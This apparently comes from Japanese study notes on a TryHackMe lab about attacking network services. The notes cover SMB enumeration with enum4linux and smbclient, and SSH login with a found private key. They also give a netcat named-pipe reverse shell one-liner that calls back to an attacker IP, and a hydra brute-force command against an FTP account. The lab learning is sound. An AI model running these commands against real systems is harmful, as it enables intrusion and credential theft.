TryHackMeメモ Network Services
kenryo
-
Enumeration
攻撃する前にターゲットに関する情報を収集するプロセスのこと -
SMB
一般的にサーバーにはファイルを転送、閲覧するためのSMB共有ドライブがある。攻撃者にとってSMBは機密情報を得るためのとっかかりとなる。 -
Port Scanning
Enumerationの最初のステップとしてポートスキャンがある。ポートスキャンによってターゲットマシンのサービス、アプリ、OSなどの情報を収集する。 -
Enum4linux
Enum4linuxはSMBの共有情報を収集するツールである。基本的にSambaパッケージのラッパーであり、簡単にターゲットのSMB情報を取得することができる。enum4linux [options] ipのように使う。オプションは以下参照。
https://www.kali.org/tools/enum4linux/
kenryo-
smbのポートを探す
nmap <ip> -vv
サービスがnetbios-ssn(139/tcp), microsoft-ds(445/tcp) -
ワークグループを探す
enum4linux -G <ip> -
マシン名(OS情報)を探す
enum4linux -o <ip>
OS Information下に出力されている -
共有情報の一覧を取得
enum4linux -S <ip>
kenryo-
CVE-2017-7494
Sambaの脆弱性。リモートから任意のコードを実行することができる。
https://www.softbanktech.co.jp/special/cve/2017/0009/ -
指定したサーバのSMB共有情報にアクセスする
smbclient //[IP]/[SHARE] -
共有情報が匿名アクセスを許可しているか確認する手順
- ユーザー名は
Anonymousを使用する - enumerationで発見した情報にアクセスしてみる
- パスワードが聞かれないことを確認する
- ユーザー名は
kenryo-
共有情報リストを取得
enum4linux -S <IP> -
特定の共有情報にAnonymousでアクセス
smbclient //<IP>/<共有情報名> -U Anonymous -
id_rsaは秘密鍵
-
id_rsa.pubは公開鍵。このファイル作成時は末尾に
ユーザー名@ホスト名が記載されている。
https://dev.classmethod.jp/articles/ssh-keygen-tips/ -
秘密鍵を指定してSSHログイン(秘密鍵のパーミッションを600にしておく)
ssh -i <秘密鍵> <ユーザー名>@<ホスト名>
kenryo-
nmapでポートを探索
nmap -p- <IP> -
tcpdumpリスナー起動し、ICMPトラフィックを監視
sudo tcpdump ip proto \\icmp -i eth0 -
telnetでターゲットとコネクション張った後、接続元マシンのIPにpingを投げる。以下のようなログが出力される。これはターゲットマシンから接続元マシンへのpingが成功したことを表す。
-
また、これはシステムコマンドをターゲットマシンで実行できることを表している。
04:15:56.017692 IP ip-10-10-145-13.eu-west-1.compute.internal > ip-10-10-160-24.eu-west-1.compute.internal: ICMP echo request, id 1227, seq 1, length 64
04:15:56.017729 IP ip-10-10-160-24.eu-west-1.compute.internal > ip-10-10-145-13.eu-west-1.compute.internal: ICMP echo reply, id 1227, seq 1, length 64
-
接続元マシンで以下を実行し、ポート4444でTCP接続を待ち受ける。
nc -lvp 4444
https://docs.oracle.com/cd/E56342_01/html/E54074/netcat-1.html -
telnetでターゲットにアクセスし、以下を実行。mdfifoで
/tmp/eofsht名前付きパイプとし、ncで接続元の4444ポートに/bin/shを実行している?これで接続元でshellコマンドが実行可能になっている。
mkfifo /tmp/eofsht; nc 10.10.108.81 4444 0</tmp/eofsht | /bin/sh >/tmp/eofsht 2>&1; rm /tmp/eofsht
https://qiita.com/richmikan@github/items/bb660a58690ac01ec295
kenryo- nmap サービスのバージョン取得
nmap -sV <IP> - ftp anonymousでログインできるか確認
root@ip-10-10-51-83:~# ftp 10.10.220.199
Connected to 10.10.220.199.
220 Welcome to the administrator FTP service.
Name (10.10.220.199:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
- ftpサーバにユーザー名daleでログインするためのパスワードをクラックする。4並列で試行。
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp"